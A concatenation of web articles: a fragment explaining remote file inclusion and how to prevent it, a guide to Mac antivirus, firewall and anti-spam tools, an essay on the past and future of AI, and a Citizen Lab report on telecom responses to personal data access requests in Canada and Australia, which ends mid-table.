include function (or equivalent in another language). The attacker can include a local file, but in a typical attack, they change the path to a file that resides on a server they control. This allows attackers to write malicious code inside a file without having to poison logs or otherwise inject code into the web server (which would be required for local file inclusion).
An attack might look like this:
What is the impact of an exploited remote file inclusion?
The impact will differ depending on the type of the remote file inclusion attack and the execution permissions of the web server user. Any included source code in malicious files could be executed by the web server with the privileges of the current the web server user, making it possible to execute arbitrary code that could lead to issues such as sensitive information disclosure and code execution at OS level. If the web server user has administrative privileges on the server, the danger goes beyond web application security and can lead to a full system compromise.
How to prevent remote file inclusion vulnerabilities
To prevent exploitation of the RFI vulnerability, make sure you disable the remote inclusion feature in the configuration of your application environment, especially if you do not need it. In PHP, you can set
'0'. You should also validate user input before passing it to an Include function. Unvalidated user input is the root cause of many vulnerabilities, such as cross-site scripting (XSS), SQL injection, local file inclusion (LFI), and many others.
If you really have to enable remote file inclusions, then work with a whitelist of files that are allowed to be included on your web application.
Vulnerability classification and severity table
|Classification||ID / Severity| | <urn:uuid:b0250366-7627-4996-ae89-05ea269feb37> | CC-MAIN-2022-40 | https://www.invicti.com/blog/web-security/remote-file-inclusion-vulnerability/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00154.warc.gz | en | 0.907741 | 1,047 | 2.890625 | 3 |
But that doesn’t mean Macs are perfectly safe and secure computers — after all, no computer is completely safe and secure on the Internet.
New malware threats (including the discovery of the first botnet operating on infected Mac OS X machines) are cropping up this year. It’s likely just a sign of things to come as Apple gains market share and visibility.
So Mac users need to understand their options for protecting their systems from malware, network attacks, and other threats.
In this guide, I’ll break down three potential areas of danger – 1) viruses and malware, 2) network attacks, and 3) spam – and details some of best the tools to combat them.
Let’s start with the classic specter of computer security – the virus or malware. The word virus is almost a misnomer these days. There are still some classic versions of viruses that spread from disk to disk, wreaking havoc and deleting files – many from a kid who created a virus because he could.
In truth, however, the bigger threats today are from forms of malware that compromise open network connections to servers over the Internet. These servers can then record personal information (user passwords, keystrokes) and take over a machine in the background.
Often these attacks fall into the categories of Trojan horses that masquerade as some innocuous application or video codec that gets installed by the average user. The most recent Mac threats started in this form as components included in real software packages pirated over the Internet.
Being vigilant about what your install and where it comes from is one way to combat this threat. But for the average Mac user who installs a file to view content on a website, the threat still exists.
Another major virus threat is that of macro viruses – most often associated with Microsoft Office. While Macs are typically not as likely to experience severe damage if they open an infected Office document, they are still capable of experiencing some problems – and of passing the virus on to others.
So every Mac should have some form of anti-virus software. Here are the major options:
ClamXav – ClamXav is a simple open source anti-virus tool that is available for free. It is based on the open source Unix clamav, but sports a Mac-like graphical interface.
ClamXav works pretty well, though its interface is a little clunky and it is generally slow at performing scans. Its big downside is that it offers less automation options than other tools, meaning users must be more pro-active about updating virus definitions (the files anti-virus tools use to detect malware) as well as performing scans. It also doesn’t allow you to scan your entire startup drive, meaning you’ll manually need to select folders to scan.
McAfee VirusScan – McAfee has a long history of developing anti-virus tools and this was at one time bundled with Apple’s .Mac service (the precursor of Mobile Me). McAfee is a decent if not stellar product. It tends to be slower than some of its competition and does show itself to be a product produced from a largely PC-oriented company.
Norton AntiVirus – Like McAfee, Norton develops security and utility tools for both the Windows and the Mac. A while back, Norton’s Mac offerings in both anti-virus and disk utilities were among the best products on the market.
But times change. Norton still produces a compelling product and I’d probably pick it over VirusScan. However, it too suffers from being very obviously a Mac product designed by a predominantly PC-focused company. For businesses that are already invested in other Norton products for managing their PCs, however, it can be an easy addition to an already complete suite (most likely with volume licensing discounts).
Sophos Anti-Virus SBE – Sophos also suffers a bit from being a PC-oriented company, but less than McAfee or Norton do. They produce a simple and lightweight solution for Mac OS X that can be centrally managed very easily.
The downside to Sophos, in my opinion, is less their PC-centric nature than their business-oriented nature and licensing. If you’re a business that has multiple Macs and PCs to protect, Sophos is a great choice (particularly if you’ve got a Windows server – even one in virtualization) to use for central management of both scanning and updating. In fact, for small businesses and/or cross platform businesses that need a simple and effective centralized management option, Sophos is a very good choice.
Intego VirusBarrier – Hands down, the best choice for consumers and for fully Mac-based businesses has to be Intego’s VirusBarrier. The company is entirely Mac focused, provides a solution that is simple, lightweight, and has a very Mac-like feel to it that make it a natural choice for many Mac users.
It also offers centralized management (and integration with Intego’s other security tools) for businesses and schools – though if you have a mix of both Macs and PCs to centrally manage, you might want to opt for Norton or Sophos because of their cross-platform management capabilities (and potentially better pricing due to larger volume purchases).
MacScan – MacScan is an anti-spyware rather than an anti-virus tool. The software is designed for detecting spyware processes and applications (keylogging, remote access, and DNS poisoning tools) that may not fall into the typical categories of viruses.
It also focuses on Internet cookies and similar data gathering tools that are not directly classified as malware. The software compares cookies (small bits of data stored by web browsers to keep track of user data when moving from one web page to another) against a blacklist of known malicious web services.
MacScan is a great complement to other anti-virus and security tools and is especially helpful for Macs commonly used by large numbers of individuals (who might place keyloggers and other malicious tools directly on a Mac rather than remotely).
One final tip, regardless of your anti-virus choice: if you’re running Windows on a Mac (either using boot camp or virtualization tools like Parallels, VMWare Fusion, or Virtual Box) don’t forget that you’ll need anti-virus software on that front too. Norton and Intego both offer Mac/PC protection suites to fill this need in a single product (though in Intego’s case the Windows software is provided by partnering with BitDefender AntiVirus for Windows).
Firewalls come in all shapes and sizes. Some are physical devices that sit between a computer or network and the Internet while others are software installed on individual machines. Regardless of their form, firewalls are designed to protect your computer from unauthorized access via its network/Internet connection.
While hardware firewalls are great for protecting all the computing devices in your home or office, they don’t offer protection for mobile computers that use a variety of public and private wireless networks. For this, software firewalls installed on those computers are needed – particularly on public networks where any computer connected to the same Wi-Fi hotspot can easily see and potentially access any other.
Mac OS X’s Built-in Firewall – Mac OS X has shipped with a built-in firewall based on the Unix ipfw firewall for several years. Leopard introduced an adaptive firewall interface that is extremely easy for users to configure and work with. It doesn’t offer the option to directly configure complex rules (just the ability to allow or deny incoming connections – though you can modify the list of allowed or blocked applications making those connections fairly easily). Advanced users familiar with Unix will also find that ipfw’s full suite of options available from the command line.
While Apple did a good job in crafting a very easy-to-use firewall and one that is generally decent, itss limitations do show, particularly if you need to a firewall for any professional situation. At the very least, however, every Mac user should be using it.
Intego’s NetBarrier – Intego again gets my props for its NetBarrier firewall. NetBarrier is designed to be easy to use (like Leopard’s built-in firewall), but is also designed to offer easy configuration of more complex rules from a Mac-like GUI. It also offers a number of pre-configured settings that can applicable to both home and education/business environments, including rules to block specific types of applications (such as peer-to-peer file sharing sites) and specific types of known threats (such as those posed by spyware).
In addition to being highly configurable and yet very easy to use, NetBarrier is a powerful tool for protecting a Mac. It offers a number of extra features beyond basic filtering of incoming and outgoing connections, including the ability to define specific sets of rules for different locations (home, office, public Wi-Fi, etc), and it shows you how much bandwidth is being used for various types of network access (web, email, iTunes file sharing, etc),
Norton Internet Security Suite – Norton Internet Security is Symantec’s firewall product for both the Mac and Windows. The suite offers a solid solution and integrates with Symantec’s Deepsight blacklist, a global list of Internet addresses associated with various forms of network attack and malware distribution. Like NetBarrier, it also allows you to define different settings based on location.
Like NetBarrier, Norton Internet Security strives to offer powerful firewall rules and protection options in a simple manner that all users can comprehend and manage. The interface isn’t quite as intuitive in my opinion, and it lacks some of the extra features that Intego built into NetBarrier. That said, it is still a powerful solution and offers a few features of its own, including a file guard technology for securing access to files on your hard drive.
DoorStop X– From Open Door Networks. DoorStop X is a firewall that offers a more stripped down interface than either NetBarrier or Norton Internet Security. Instead of being focused on consumer-friendly interface elements and extra features, DoorStop X focuses on simply being a good firewall. It allows a decent set of rules and enables you to easily configure protection for common Mac services (such as web access and file sharing).
The downside is that DoorStop X is not as easy as NetBarrier or Norton to configure for novice computer users. For consumers looking for a very simple solution, this probably makes it a less desirable choice. For power users and technicians wanting something that allows easy configuration of the core features of a firewall without a lot of bells and whistles, this can actually make DoorStopX somewhat more appealing.
IPNetSentryX – IPNetSentryX is a fourth firewall option for Mac OS X. It is a robust tool that operates slightly different from a traditional firewall. Typically, firewalls rely on a fixed set of rules to allow or deny connections (the default rule being to deny everything). IPNetSentryX does offer this, but it’s designed to run in an adaptive fashion, monitoring your network/Internet traffic but not blocking connections unless there is some suspicious activity (either defined by its default settings or by your custom rules).
Although its approach makes for a lightweight and adaptive product (and one which can be used for anything from simple protection to complex bandwidth management), IPNetSentryX’s interface is probably the least user friendly of the firewalls available for Mac OS X. This can be off-putting to many users. However, if you’re a power user or technician and want to leverage a number of complex firewall options, it’s worth checking out.
Who’s There? – A companion product to DoorStop X, Who’s There? isn’t a firewall itself, but rather an application that reads firewall logs and provides information and advice about the entries it finds. This can help you fine-tune your firewall settings and better understand how your firewall is protecting (or not protecting) your Mac.
Little Snitch – Like Who’s There?, Little Snitch isn’t a firewall but a useful companion to one. But while Who’s There? and your firewall logs can often inform you easily about incoming connections to your Mac, Little Snitch is focused on the opposite – telling you what applications and services (such as file sharing or iTunes Music Sharing) your Mac is attempting to connect with on network resources or the Internet.
Since some malicious tools (or even legitimate software) installed on your Mac are typically allowed to make outgoing connections through a firewall, being aware of exactly what the software on your Mac is trying to do and who it’s trying to contact can be a great security aid.
Armed with the information that Little Snitch provides, you can craft better firewall rules if needed. You can also use it to turn off unused services (such as file sharing, screen sharing, or even iTunes) that could make your Mac more vulnerable to attack. It even provides a way of simply being aware how people using your Mac are accessing the Internet. All of these make Little Snitch a great Mac security aid.
Most people tend to think of spam as an annoyance that clogs up their inbox and keeps them from getting to really important emails – and that’s certainly true. But spam isn’t just a productivity killer, it can pose a real security threat. Junk emails often load web content that has the potential to impact your computer whether or not you click on a web site referenced in the message.
And often clicking a link in a message will deliver you to some form of malicious website designed to either install malware or use a phishing scheme intended to mine personal information.
The fight against spam can and should take place on multiple levels. Ideally, your mail server will have its own junk mail filtering. Public services like Apple’s Mobile Me, GMail, YahooMail, and Hotmail offer some of the best spam filtering because they handle mail accounts for so many people. But private servers (those run by an Internet provider or private company) may not have such extensive or fine-tuned spam filtering.
Beyond the server level, filtering can take place on your computer. Almost all email applications, including Apple’s Mail and Microsoft’s Entourage (the two most common Mac email clients) include some junk mail filtering options. But you can extend those capabilities with additional anti-spam software, including the following:
SpamSweep – SpamSweep is an application that acts as a middleman between your email client. SpamSweep connects to your mail server, downloads the first 100K of each message, scans them, and then deletes the spam while it’s still on the server (you can control confirmation of what is and isn’t spam). When your mail application connects, it downloads the remaining (good) messages.
SpamSweep uses a combination of blacklist (bad) and whitelist (good) email senders as well as a technique called Bayesian filtering, which analyzes the content of each message to determine how to mark messages. These filters and lists can be trained by marking mail as spam (or not spam) and grows more accurate over time as you use the software.
Overall, SpamSweep is pretty good at making good choices and you can define some overrides to its basic features. On the downside, it does need to sit as a separate program rather than being integrated into your email client and it’s a little disconcerting to have a separate program deleting messages for you. Also, it doesn’t provide any real customized rulemaking options other than training its filters over time.
SpamSieve – SpamSieve may be the best of the anti-spam additions for Mac OS X. While it uses the same filtering techniques as SpamSweep, it does so by integrating with your email client and Mac OS X’s Address Book. It supports a wide range of clients, including the most common Mail, Entourage, Eudora and Thunderbird.
So you don’t need to launch a separate application to confirm the software’s spam/not spam decisions. It also means your email is still managed by your email application. The support for Address Book (and contacts in Entourage) is a nice way of ensuring anyone you actually know will be able to reach you.
SpamSieve does offer its own separate application as well. This is used to configure filters (and quite a bit of configuration is supported) and training process. It also allows you to configure mail notifications and other points of integration with your email client. Perhaps most importantly, SpamSieve does an impressive job of accurately filtering spam.
Intego Antispam – Intego’s offering in antispam category, appropriately named Personal Antispam, is another good choice. It integrates with either Mail or Entourage and can integrate with Address Book for trusting contacts. Although this is a more limited set of email clients than other tools, it does cover most Mac users.
As with their other tools, Intego has put an effort into making Antispam very user friendly. Beyond just being user-friendly, it offers the ability to customize filtering and offers filtering options beyond just blacklist/whitelist and Bayesian filtering options in other tools. You can also filter based on types of attachments or portions of web site addresses noted in an email. This provides additional capabilities. A particularly nice feature is that not only can you configure each type of filter, you can also opt to use all or only some of them.
Personal Antispam enables you to export spam rules as files for installation directly on other Macs running the software. It also offers usage reports and graphs, helping you see the percentage of spam being filtered as well as the types. Overall, this is another great product from Intego.
Mac Security Software: More Information
While keeping your Mac secure is about finding the right mix of tools for your needs (and your level of comfort with technology), equally important is keeping those tools updated and understanding how to use them effectively. Whichever tools you choose, be sure to read and understand the documentation.
And remember, security doesn’t stop with the introductory guide. The following websites provide additional information and tips for Mac security:
Mac Security Guide from Home PC Firewall Guide. | <urn:uuid:0275a43f-2af9-4183-9db9-82a2c72b6170> | CC-MAIN-2022-40 | https://www.datamation.com/security/the-best-mac-security-software/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00154.warc.gz | en | 0.940345 | 3,855 | 2.875 | 3 |
Artificial intelligence is a topic that’s been discussed for decades, but it’s an industry still very much in its infancy - we’re only seeing the beginning of its capabilities. There are areas where AI has become heavily relied upon - such as algorithmic trading - but, in general, the broad adoption of the technology is still marginal. As an industry, it’s a toddler you could say, but we’re at a point in time where we can expect to see it grow up - and fast.
There have been notable achievements and breakthroughs throughout the years which we can look at to get a better understanding of where AI is at today. First came expert systems that were adopted in the 70s and 80s for use in our cars, PCs, and other forms of manufacturing, but which failed dramatically when applied to fields such as healthcare, so hit a barrier in terms of their exponential adoption.
Google’s search engine and Amazon’s recommendation system were the masterpieces of the next AI wave in the 90s which introduced today’s ‘pattern recognition’ boom. This is all about AI learning to recognise features and patterns in complex data even where humans fail to identify them. The biggest success stories here are in:
- Natural language processing, from speech recognition and machine translation, to automated text summarisation and question answering.
- Image, video, and other signal processing for detecting complex patterns, such as activity trackers learning to detect different types of activity from motion signals.
An important milestone was the highly publicised machine over man triumph in 1997 when IBM’s Deep Blue chess computer won over the reigning world chess champion Garry Kasparov. This was symbolically significant because it was one of the first demonstrable examples of a machine outperforming a world leader in its field. The Deep Blue victory established an understanding that AI could be used to solve very complex problems. If it could beat the best chess player in the world, what could it do next?
Since then, AI has found its way further into online user experiences and optimisation of online ads, but hasn’t been adapted as fast as many may have predicted 20 years ago. However, recent advances in deep learning, exemplified by Google's AlphaGo surprise win over the world’s elite Go players in 2016, signal that a new generation of AI algorithms are making their way into the market. This suggests that the next 20 years will see an acceleration of the importance of AI almost any industries.
We’re now seeing three pillars of AI markets which are all developing in different ways, with various companies operating within them.
- The ‘AI as infrastructure’ market where companies directly sell AI services or platforms.
- The ‘AI as a vertical’ market where highly-skilled teams apply AI to a specific vertical, directly competing with established players, e.g. in finance, life science, energy etc.
- The ‘AI as a growth driver’ market. Here, AI technologies are applied - often in a very bespoke way - to specific problems in a wider industry, e.g. object recognition for detecting hurdles in a traffic lane.
If we look at the forecast of AI across the next five years, the biggest trend impacting the corporate world is the importance of external data and how AI will be used to incorporate this into more proactive decision making processes. External data is one of the biggest blind spots in corporate decision making today, with many executives making decisions primarily based upon internal insights. This is a very reactive approach because internal data is a lagging performance indicator. It is looking at the result of historic events that took place in the past - weeks, months, quarters, sometimes years in the past.
In external data, however, you can find many forward-looking insights about your entire competitive landscape. By monitoring job postings you can track - in real-time - the appetite for investments among competitors, partners, distributors, and suppliers. You can also harness insights into how competitors spend their online marketing dollars; do they increase their spend in Europe or are they doubling down in North America? By mining social media, you can pick up on changing trends in consumer preferences informing investment decisions in existing or new product lines. By analysing external data, executives can find forward-looking insights and indicators to help them stay on top of changes in their competitive landscape and to be proactive in their decision making. We call this approach OI (Outside Insight) and over time we believe the need to analyse external data will grow into an entirely new software category analogous to what BI (Business Intelligence) is to internal data.
In saying this, the ultimate potential market for AI is very large and will extend far beyond its current scope. The industries AI is having an impact on will continue to expand with transportation, food and drink, healthcare, finance and risk assessment likely to be the most transformed by new approaches. We’ll also continue to see even more successful targeting outside of Adtech; specifically moving into politics (Cambridge Analytica, Palantir), journalism (Buzzfeed, targeted content farming) and healthcare.
Three key factors driving AI going forward are:
- Exponential growth of cloud-based computing power (per dollar)
- Further advancements in AI techniques such as deep learning
- Continued growth of available data (internal company data, external online data, data generated by IoT)
Combined, these three factors will make AI stronger, more reliable and more relevant for an increasing number of decision makers across functions in any or industry. As such, AI will play a meaningful role in the total corporate IT spend within the next decade. It’s reasonable to expect it to grow into the hundreds of billions of dollars, if not more.
Although the development of AI is at an exciting stage, there are still challenges related to the experience and skill required to design new systems. There will be big changes in the near future, but the best is yet to come.
Jorn Lyseggen, Founder & CEO, Meltwater (opens in new tab)
Image Credit: John Williams RUS / Shutterstock | <urn:uuid:6d72cbba-5a6f-4bed-bac9-d5934904c094> | CC-MAIN-2022-40 | https://www.itproportal.com/features/ai-where-did-it-come-from-where-will-it-go/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00154.warc.gz | en | 0.952321 | 1,261 | 2.703125 | 3 |
How do the companies that provide the services we use to connect online and communicate handle our personal data?
What types of data do they collect?
How long do they retain it for?
Do they share it with any third parties?
Without knowing who is collecting personal data, for what purpose, or for how long, or the grounds under which they share it, a consumer cannot exercise their rights nor evaluate whether a company is appropriately handling their data.
As of 2019, 134 countries around the world have enacted data protection laws. A primary right under many data protection regimes is data access requests (DARs) which are written queries that an individual sends to a private company whose products or services the individual uses. DARs ask that company to disclose all of the data and information that the company holds on that individual, including when, how, to whom, and for what reasons a company shares or discloses the individual’s data, and other details about the company’s data protection practices and compliance with applicable privacy laws. Although the right to make DARs is part of many data protection laws in theory there is limited empirical documentation of how companies respond to these requests in practice.
In 2014, the Citizen Lab and Open Effect started Access My Info (AMI) a research project that uses data access requests and complementary policy, legal, and technical methods to learn about how private companies collect, retain, process, and disclose individuals’ personal data. Accompanying the research methodology is a web-based tool that helps members of the public generate data access requests based on templates tailored to different industries.
AMI was first applied in Canada and resulted in tens of thousands of Canadians making DARs to telecommunication companies. The results of the study showed inconsistent responses across companies and documented consumers experiencing in significant barriers to accessing their data.
Following the first AMI project in Canada, the Citizen Lab formed a working group to bring the research method to Asia and comparatively measure responses to DARs across the region. The working group includes academics, lawyers, advocates, and designers working in five jurisdictions:
🇰🇷South Korea: Kelly Kim (OpenNet Korea), KS Park (Korea University)
🇦🇺Australia: Adam Molnar (University of Waterloo / Deakin University)
🇮🇩Indonesia: Sinta Dewi Rosadi (University of Padjadjaran)
🇲🇾Malaysia: Sonny Zulhuda (International Islamic University Malaysia)
Each partner sent data access requests to telecommunication companies and Internet Service Providers (ISPs) in their respective jurisdictions to better understand the type of data these companies collect on their customers, how long this data is retained for, and if it is shared with third-parties. Partners also sought to learn the methods by which these companies responded to requests: how long requests took to be fulfilled and the amount of work required on the part of the requester, as well as if and how fees for access are obtained.
While each jurisdiction has unique laws and context we found general patterns across them.
Data Protection in Asia is a dynamic legal space: Asia is a particularly interesting region to conduct this study because it includes countries with strong personal data access laws and those with none or that are in the process of establishing data protection legislation. A commonality across all jurisdictions is that elements of data protection are in flux or subjects of debate.
While South Korea has the strongest data protection laws in the region, the AMI project found superficial compliance to DARs from telecommunication companies. All companies had online data request procedures, but the majority of companies only provided copies of their privacy policies in response to the data access requests. In response AMI partner Open Net Korea filed a lawsuit against Korea Telecom for not providing a complete response to DARs
In Hong Kong and Australia defining what is personal data has raised debate. In Hong Kong telecommunication companies and ISPs argue that Internet Protocol (IP) addresses and geolocation records are not personal data and therefore they are not required to give user access to this data. In Australia IP addresses are currently not included in the legal definition of personal information.
Other jurisdictions with emerging or non-existent data protection laws faced other challenges. Malaysia has established a data protection law, but it is not robustly enforced; Indonesia has a draft data protection bill but has not yet passed it into legislation. As a result in both jurisdictions DARs resulted in limited responses from companies.
Responses from telecoms across jurisdictions have been inconsistent with what was requested and in some cases what is required by law: Overall, we found that responses from telecoms were incomplete and in some cases did not follow what is required by law. Generally, across the different jurisdictions we find that telecoms have yet to develop a mature process to fulsomely handle requests for personal data. These results show the importance of measuring how laws function in practice, rather than only reviewing what they mandate on paper.
This report provides results from each Asian jurisdiction as a series of case studies. We also include a summary of results from Canada (the first jurisdiction AMI was applied in) for comparative purposes.
Christopher Parsons (Citizen Lab, University of Toronto)
- Barriers to Access: All telecommunications companies charged participants a fee for access to detailed SMS or call records.
- Variation in Responses: Previous research showed that telecommunications companies generally did not clearly tell participants if their data had been shared with third parties such as government agencies. In 2016, the majority of these companies provided clear responses to the question of third party data sharing.
Canadian telecommunications companies’ collection and use of personal data is regulated by a federal law, the Personal Information Protection and Electronic Documents Act (PIPEDA). The law is centred around ten fair information principles:
- Identifying Purposes
- Limiting Collection
- Limiting Use, Disclosure, and Retention
- Individual Access
- Challenging Compliance
Organizations that collect personal data must have an employee responsible for compliance with PIPEDA. Such employees must identify the purposes for which information is collected, prior to the collection occurring, and any collection may only take place with the knowledge and informed consent of the data subject. Data collection activities should be minimized to that which is needed to accomplish a specific task. Data should only be used or disclosed for the purposes it was collected for and if it is no longer needed it should cease being retained. Data must be accurate and up-to-date, and protected by strong policy and technical safeguards. Companies must publicize documents describing their privacy practices and provide data to consumers upon request. Finally, consumers can challenge companies if they believe the companies have insufficiently complied with the law.
Table 1 provides an overview of how the principle of access to consumer data functions in the Canadian context:
|Legal justification||Principal 4.9 of the Personal Information Protection and Electronic Documents Act (2000)|
|Phrasing||“Upon request, an individual shall be informed of the existence, use, and disclosure of his or her personal information and shall be given access to that information”|
|Response deadline||30 days, with a 30 day extension possible|
|Fee for access||“At minimal or no cost to the individual”|
|Remedies if unsatisfied with response?||An individual may file with the Office of the Privacy Commissioner of Canada a written complaint against an organization|
Table 1: Overview of Canadian law about data access requests
The Canadian telecommunications market is composed of several large incumbent companies as well as many much smaller competitive companies. There are little to no international companies offering competing services into Canada. Among wireless providers, the concentration is even more stark, with the incumbent’s being the largest companies which offer mobile service and include Bell Canada, Rogers Communications, and Telus. Each of these companies operate subsidiary brands that use their infrastructure.
The Canadian telecommunications service provider industry has a history of granting government agencies access to subscriber information for criminal investigations or other security reasons without first requiring a warrant or judicial order compelling the provision of such information. This practice has stopped following a Supreme Court of Canada decision in 2016. Furthermore, due in part to pressure from Canadian privacy advocates and academics in the form of open letters, parliamentary questions, and a data access request campaign, some Canadian telecommunications service providers now release transparency reports which provide some statistical reporting concerning the regularity at which government agencies request, and receive, information pertaining to companies’ subscribers and customers.
Access My Info: Canada
In 2016, the AMI Canada team recruited five participants who individually sent data access requests (DARs) to five different telecoms: Bell, Fido, Rogers, Shaw, and Wind. Such requests can be issued to companies per PIPEDA and legally compel companies to respond to such requests. We analyzed only one request per company.
All Canadian telecommunications companies who were issued DARs responded to requests for access to personal data within the mandated 30 day period.
Table 2 lists the companies that DARs were sent to, the date that the DAR was issued, and the date of the first response from the company.
|Company||Request Date||First Response Date|
Table 2: 2016 DAR Issuance and Response Dates
Most companies responded to the question of whether data had been shared with law enforcement; in the case of the participant’s DARs, all of the companies indicated that data had not been shared with law enforcement or other third parties. This direct responses received from companies stands in contrast to the results of DARs asking the same question in 2014. During the 2014 research project, no company provided a clear or direct response to this same question.
All companies responded with some form of cover letter that acknowledged the receipt of the request and, typically, also provided some general responses to the questions in the DAR. DARs issued by participants also asked for access to technical data that was associated with the requester, such as IP address logs or geolocation information. Companies were unwilling to provide this data free of charge, and there was significant variation in how much money was required before technical data would be disclosed. In most cases the proposed fees were in the hundreds of dollars.
These costs served as a significant barrier to access, as our research participants did not pay for these data and therefore could not obtain full access to their data. The cost for access and introduction of more steps required to get access are hypothesized as establishing barriers for persons to access their own personal information.
|Company||Fee requested? For what?||Tell requester if data shared with law enforcement?||Notes|
|Bell Canada||Will provide a cost estimate for historical assigned IP addresses upon request||Says they have to check with authorities first and to inform Bell whether the request wants the company to do so||Generally responded to most questions asked but failed to provide data retention period information.|
|Rogers Communications / Fido Solutions||Detailed SMS and call metadata including cell tower info ($100/month); Call logs beyond 18 months old ($15/month)||Yes||Generally responded to most questions. Stated the companies retain call log/SMS metadata (cell tower assignments) for 13 months. Asserted that the companies do not collect geolocation data. Provided IP address retention periods (7 days mobile; 13 month home Internet).|
|Shaw Communications||Historical assigned IP addresses ($250 per year per modem)||Yes||Generally responded to most questions. Did not provide data retention periods. Asserted the company does not collect location data as they do not provide mobile services at the time research was conducted.|
|Wind Mobile (now Freedom Mobile)||Stated metadata could be retained but did not mention that customer could get access to retained information.
Participant did not follow up with additional requests for clarity to the company.
|Yes||Generally responded to most questions. Indicated customers can get access to retained call logs for 90 days but did not specify the company’s own retention period. Provided detailed scenarios in which geolocation data may be collected such as in an e911 event, and the company provided a statement saying such data was not collected for the requester.|
Table 3: Summary Analysis of DAR Responses from Telecommunications Service Provider Data in Canada, 2016
DARs can be a valuable method for understanding the kinds of information which are collected, retained, processed, and handled by private companies. However, our study found that Canadian Telecommunications Service Providers’ processes surrounding DAR-handling and -processing were immature. Advancing DAR practices and policies requires either private-sector coordination to advance individuals’ access to their personal information or regulatory coordination to clarify how private organizations ought to provide access to the information of which they are stewards.
Below are three recommendations from our full report of steps companies can take before, during, and after requests to improve the process by which citizens can obtain access.
- Companies should review their access processes and assess where improvements could be made to reduce cost, reduce, or make more user-friendly their identity verification steps, and streamline security procedures.
- Companies should publish data inventories describing all the kinds of personal information that they collect and freely provide copies of a small set of representative examples of records for each kind of personal information to subscribers upon request.
- Companies should collaborate within their respective industries to establish common definitions for personal data to which common policies are applied, such as subscriber data, metadata, and content of communications, amongst others.
Andrew Hilts, Christopher Parsons, and Masashi Crete-Nishihata, 2018, “Approaching Access: A look at consumer personal data requests in Canada,” Citizen Lab, University of Toronto.
Adam Molnar (University of Waterloo)
- Barriers to Access: Many telecommunication companies failed to comply to requests for reasons unknown.
- Variation in Responses: For those that did reply, information was uneven in terms of scope of information disclosed, guidance, and pricing.
In Australia, the relevant statutory authority for privacy and data access rights is the Privacy Act 1988 (Privacy Act). In 2014, the Privacy Act was reflected in a policy guidance document known as the ‘Australian Privacy Principles’ (APPs) as a way to simplify the explanation of the mandatory cornerstones of the Australian Privacy Act.
Two items are particularly relevant regarding subscriber access to telecommunications information under the APPs. The first, s.6(1) of the Privacy Act, is the legal definition of ‘personal information.’ Personal information is defined in the Act as “any information or an opinion about an identified individual, or an individual who is reasonably identifiable.” Common examples of personal information under the Act include an individual’s name, signature, address, phone number, date of birth, bank account details, and so on. The term “about” is particularly salient in the context of data access requests because it refers to personal information that may actually be broader than the aforementioned examples of data that would still identify an individual. For example, information “about” an individual might include a vocational reference or an assessment about an individual’s career, or personal views that can be expressed by an author. Together, these two elements delimit the scope of information that is defined as constituting personal information. In a notable case in the Administrative Appeals Tribunal (Grubb v Telstra), IP addresses were excluded from the definition of personal information because they were legally defined to be about Telstra business practice rather than about Mr. Grubb. This position was upheld in Federal Court in an appeal by the Australian Privacy Commissioner. While IP addresses are currently not included in the legal definition of information in Australia, some legal commentators insist that the issue remains unresolved given the narrow terms of appeal that the Privacy Commissioner pursued in the Federal Court.
The second relevant item under the APPs refers to access and correction of personal information (APP 12 and 13). Entities that fall under the Privacy Act (“any entity that has an annual turnover of over $3,000,000”) are obligated to provide access to personal information that they hold upon request by an individual. The table below elaborates on the key items associated with access provisions under the Privacy Act and APP 12; combined, these items make explicit that persons living in Australia have the right to make Data Access Requests (DARs) to private organizations.
|Legal justification||APP 12.1 – Access|
|Phrasing||“If an APP entity holds personal information about an individual, the entity must, on request by the individual, give the individual access to the information.”|
|Response deadline||The APP entity must:
Accompanying APP Guidelines state that, “as a general guide, a reasonable period should not exceed 30 calendar days.”
|Fee for access||If the APP entity is an organisation, and the entity charges the individual for giving access to the personal information, the “charge must not be excessive and must not apply to the making of the request.”|
|Remedies if unsatisfied with response?||12.9 Refusal to give access
“If the APP entity refuses to give access to the personal information because of sub clause 12.2 or 12.3, or to give access in the manner requested by the individual, the entity must give the individual a written notice that sets out:
12.10 If the APP entity refuses to give access to the personal information because of paragraph 12.3(j), the reasons for the refusal may include an explanation for the commercially sensitive decision.
Under s.28(1) of the Privacy Act, the Information Commissioner has powers to investigate possible interferences with privacy, either following a complaint or on the Commissioner’s own initiative.
The Australian Telecommunications Service Provider (TSP) and Internet Service Providers (ISP) market is best understood as a ‘mixed’ market of network providers (wholesalers) and service providers (resellers). There are public agencies that both own infrastructure and provide service (i.e., National Broadband Network), there are private entities that both own infrastructure and provide services (i.e., Telstra, Vodafone, and Optus) and, lastly, there are private entities that exist solely as service providers which have ‘leased’ access to the infrastructure (i.e., Jeenee and Amaysim). The Australian market raises considerations with regard to eligibility under the APPs and comparisons within and across network owners versus service providers. For instance, smaller companies such as Amaysim run on Optus’ network, yet exist solely as a service provider. As a result, their particular link into telecommunications infrastructure means that they have access to different types of data, which influences the scope and type of data that can be disclosed under both subscriber and law enforcement requests.
Access My Info: Australia
Nine volunteers submitted written data requests by mail between the periods of December 2015 and February 2016. One volunteer made a request to Telstra, three volunteers requested to Optus, one volunteer to iiNet, one volunteer made two different requests to Vodafone. One volunteer also made a request to TPG, two volunteers made a request each to Amaysim, and one volunteer made a request to Jeenee. The table below provides a detailed itemisation of the timeline associated with requests issued to each company and the companies’ response dates.
|Company||Request Date||First Response Date|
|Telstra||Dec 12 2015 (online portal)||1st Jan 25 2016 with invoice for retrieval (paid)
2nd data provided on March 2 2016
|Optus||Dec 12 2015 (First Request)||None
Feb 25 2016 Phone Call made – no trace of request
|Optus||March 15 2016 (Second Request)||None|
|Optus||Feb 2 2016 (Third Request)||Mar 3 2016 – contacted subscriber by phone, told customer they would need subpoena to access the data, subscriber requested information via email, which they sent that day.
Mar 16 2016 – Subscriber replied to email asking why info couldn’t be released under APPs and received no reply.
|iiNet||Dec 12 2015||No reply|
|Vodafone||Dec 12 2015 (First Request)
Feb 9 2016 (Second Request)
Reply from Vodafone on Mar 3 2016 noting receipt of both requests, and included attached letter detailing costs for retrieval, including a Nondisclosure Agreement (bit more on what the NDA was for)
